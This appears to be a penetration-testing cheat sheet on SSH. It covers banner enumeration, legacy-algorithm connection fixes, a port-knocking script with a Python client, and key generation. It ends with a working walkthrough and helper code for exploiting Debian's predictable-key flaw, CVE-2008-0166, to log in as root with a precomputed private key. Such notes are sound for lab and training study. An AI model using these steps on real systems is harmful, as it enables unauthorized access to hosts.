SSH

Enumeration

Identify the OS version from the OpenSSH version string. The banner that sshd sends before key exchange (for example SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3) usually carries the distribution's package version suffix, which maps to a specific OS release; a banner grab with netcat or an nmap -sV service scan is enough to read it.

Error: SSH Private Key Permissions Are Too Open (WARNING: UNPROTECTED PRIVATE KEY FILE!)

ssh refuses to use a key file that other users can read. Restrict it to the owner, then pass the same path with -i:

chmod 600 id_rsa
ssh -i id_rsa user@<IP>

If Faced With Error:

no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

Solution:

The server only offers legacy key-exchange methods that modern clients disable by default. Re-enable the one it offers for this connection only (the leading + keeps the client's default list and appends the legacy method):

ssh sunny@10.10.10.76 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1

Old servers often fail on the next negotiation step too ("no matching host key type found" or "no matching cipher found"); the same -o pattern works with HostKeyAlgorithms and Ciphers, taking the value from the server's offer in the error message.

# To SSH using a DSA private key, add to /etc/ssh/ssh_config (or ~/.ssh/config):
PubkeyAcceptedKeyTypes +ssh-dss

OpenSSH 8.5 renamed this option PubkeyAcceptedAlgorithms (the old name is still accepted as an alias), and recent releases have dropped DSA entirely (disabled at build time in 9.8, removed in 10.0), in which case an older client build is needed.

Port Knock

for i in 571 5292 291;do nmap -Pn --host-timeout 201 --max-retries 0 -p $i <IP>; done
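The nmap loop above sends one probe per port (--max-retries 0) in the configured order, which is all a knock daemon looks at. The following is an added example, not code from the original page: a knock client that does the same with plain TCP connect attempts, alongside a constructed KnockRecorder that stands in for the daemon on loopback ephemeral ports so the sequence can be checked offline. The sequence_matches rule (the most recent hits must equal the configured sequence) is an assumption about how a knockd-style daemon decides, not taken from any specific daemon's source.

```python
"""Port-knock client plus a local stand-in for the knock daemon.

Added example, not from the original page. knockd-style daemons act on the
ORDER in which connection attempts hit the knock ports; whether the TCP
connect succeeds is irrelevant, so refused or timed-out connects are normal.
KnockRecorder is a constructed test double bound to 127.0.0.1 ephemeral
ports so the client can be exercised offline; a real daemon would instead
open the protected port after a correct sequence.
"""
import selectors
import socket
import threading
import time
from typing import List, Sequence


def knock(host: str, ports: Sequence[int], timeout: float = 1.0,
          delay: float = 0.2) -> List[int]:
    """Send one TCP connect attempt per port, in order. Returns the ports hit."""
    hit = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))      # SYN goes out; RST or timeout is fine
        except OSError:
            pass
        finally:
            s.close()
        hit.append(port)
        time.sleep(delay)                # let the daemon log this hit first
    return hit


def sequence_matches(seen: Sequence[int], expected: Sequence[int]) -> bool:
    """Daemon-side rule (assumed): the door opens when the most recent hits
    equal the configured sequence; any extra wrong hit breaks the attempt."""
    n = len(expected)
    return n > 0 and list(seen[-n:]) == list(expected)


class KnockRecorder:
    """Listens on `count` ephemeral loopback ports and records the order in
    which connections arrive. Constructed for this example only."""

    def __init__(self, count: int):
        self.ports: List[int] = []
        self.seen: List[int] = []
        self._socks = []
        for _ in range(count):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind(("127.0.0.1", 0))     # kernel picks a free port
            s.listen(5)
            self._socks.append(s)
            self.ports.append(s.getsockname()[1])
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self) -> None:
        sel = selectors.DefaultSelector()
        for s in self._socks:
            sel.register(s, selectors.EVENT_READ)
        deadline = time.time() + 10
        while len(self.seen) < len(self._socks) and time.time() < deadline:
            for key, _ in sel.select(timeout=0.5):
                conn, _addr = key.fileobj.accept()
                self.seen.append(key.fileobj.getsockname()[1])
                conn.close()
        sel.close()
        for s in self._socks:
            s.close()

    def wait(self, timeout: float = 12.0) -> List[int]:
        self._thread.join(timeout)
        return self.seen


def demo() -> bool:
    """Knock a local recorder in the right order and check it would open."""
    rec = KnockRecorder(3)
    sequence = rec.ports               # on a target: the page's 571 5292 291
    knock("127.0.0.1", sequence)
    return sequence_matches(rec.wait(), sequence)


if __name__ == "__main__":
    print("knock accepted:", demo())
```

Against a real target, call knock("<IP>", [571, 5292, 291]) and then probe the protected port; the delay between hits matters because some daemons process their log asynchronously and can miss hits that arrive too close together.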

Generate Private & Public Keys

# Private key (2048-bit RSA, PEM)
openssl genrsa -out private.pem 2048

# Public key (PEM SubjectPublicKeyInfo, the form OpenSSL and TLS tooling use)
openssl rsa -in private.pem -out public.pem -pubout -outform PEM

Note that public.pem is not the single-line "ssh-rsa AAAA..." format that authorized_keys expects; ssh-keygen's -y option, run against private.pem, prints that line. The private key itself is accepted by ssh -i as-is.

OpenSSH 4.3p2 Exploit (Debian weak keys)

  • Exploit Link

  • Predictable PRNG: Debian's patched OpenSSL (CVE-2008-0166) seeded its random number generator with little more than the process ID, so every key generated on an affected system is one of a small, precomputable set indexed by key type, key size and PID.

$ ssh-keygen -l -f targetkey.pub
2048 c6:7b:14:fa:ae:b6:89:e6:67:17:ee:04:17:b0:ec:4e targetkey.pub

The first field is the key size and the second the MD5 fingerprint (current ssh-keygen prints SHA256 fingerprints by default; pass -E md5 to get this form). Opening the public key in an editor shows it starts with "ssh-rsa", so the key type is RSA. To locate the matching private key, extract the precomputed weak-key archive from the exploit link and look for a file named:

rsa/2048/**c67b14faaeb689e66717ee0417b0ec4e-26670**

The filename is the key type, the key size, the fingerprint in hexadecimal with the colons removed, and the process ID that seeded the generator when the key was made (26670 here). To authenticate to a vulnerable system that trusts this public key, use that file as the identity:

$ ssh -i rsa/2048/c67b14faaeb689e66717ee0417b0ec4e-26670 root@targetmachine
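Both the key-generation section above and this lookup turn on the OpenSSH public-key line format: the base64 blob is what ssh-keygen fingerprints, and the type, size and MD5 of that blob give the filename to search for. The following is an added example, not code from the original page or from the exploit: it encodes an RSA (e, n) pair into that line, parses it back, and builds the rsa/<bits>/<md5>- prefix. SAMPLE_N is a constructed 2048-bit integer standing in for a real modulus, and the filename layout is taken from the page's example above rather than from the archive's documentation.

```python
"""Rebuild what `ssh-keygen -l` reports (type, size, MD5 fingerprint) from an
OpenSSH public-key line, and derive the precomputed-key filename prefix.

Added example, not from the original page. The sample key is constructed:
SAMPLE_N is a fixed 2048-bit integer standing in for a real modulus, so the
key cannot authenticate anywhere; it only exercises the format.
"""
import base64
import hashlib
import struct
from typing import Dict, Tuple


def _ssh_string(data: bytes) -> bytes:
    """RFC 4251 string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    """RFC 4251 mpint: big-endian two's complement; a 0x00 byte is prepended
    when the top bit is set so the value is not read as negative."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)


def rsa_to_openssh(e: int, n: int, comment: str = "") -> str:
    """Encode (e, n) as the single-line `ssh-rsa AAAA... comment` format that
    authorized_keys expects; the base64 part is the blob ssh-keygen hashes."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    line = "ssh-rsa " + base64.b64encode(blob).decode("ascii")
    return line + (" " + comment if comment else "")


def _read_string(blob: bytes, off: int) -> Tuple[bytes, int]:
    (length,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    return blob[off:off + length], off + length


def parse_openssh_pubkey(line: str) -> Dict[str, object]:
    """Parse an ssh-rsa public-key line into type, e, n, bit size and the
    MD5 fingerprint in the colon-separated form older ssh-keygen prints
    (modern ssh-keygen needs `-E md5` to show it this way)."""
    fields = line.split()
    if len(fields) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    blob = base64.b64decode(fields[1])
    ktype, off = _read_string(blob, 0)
    if ktype != b"ssh-rsa" or fields[0] != "ssh-rsa":
        raise ValueError("only ssh-rsa keys are handled here: %r" % ktype)
    e_raw, off = _read_string(blob, off)
    n_raw, off = _read_string(blob, off)
    n = int.from_bytes(n_raw, "big")         # a leading 0x00 pad is harmless
    md5_hex = hashlib.md5(blob).hexdigest()  # fingerprint = MD5 of the blob
    return {
        "type": "ssh-rsa",
        "e": int.from_bytes(e_raw, "big"),
        "n": n,
        "bits": n.bit_length(),              # the "2048" in ssh-keygen -l
        "md5_hex": md5_hex,
        "md5_fingerprint": ":".join(md5_hex[i:i + 2] for i in range(0, 32, 2)),
    }


def weak_key_name_prefix(info: Dict[str, object]) -> str:
    """Filename prefix in the precomputed weak-key set, following the page's
    example: <type>/<bits>/<md5 without colons>-  (the PID suffix follows)."""
    return "rsa/%d/%s-" % (info["bits"], info["md5_hex"])


# Constructed sample: a 2048-bit integer with the top bit set, NOT a real key.
SAMPLE_N = (1 << 2047) | 0x10001
SAMPLE_KEY = rsa_to_openssh(65537, SAMPLE_N, "constructed@example")


if __name__ == "__main__":
    info = parse_openssh_pubkey(SAMPLE_KEY)
    print(info["bits"], info["md5_fingerprint"])
    print("look for:", weak_key_name_prefix(info) + "<pid>")
```

Feed parse_openssh_pubkey a real targetkey.pub line and the md5_fingerprint field should equal the ssh-keygen -l -E md5 output; a glob on weak_key_name_prefix(info) + "*" inside the extracted archive then finds the private key with whatever PID suffix it carries.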
